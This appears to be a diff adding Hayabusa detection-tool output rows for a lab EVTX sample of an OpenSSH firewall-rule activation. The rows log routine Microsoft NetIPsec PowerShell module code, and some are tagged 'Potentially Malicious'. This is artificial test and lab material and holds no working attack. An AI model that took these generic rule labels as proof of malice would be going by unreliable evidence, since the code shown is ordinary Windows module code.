+2021-04-23 19:09:45.450 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.450 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.451 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.452 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.462 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.462 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.463 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.463 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.477 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.477 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.480 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.499 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 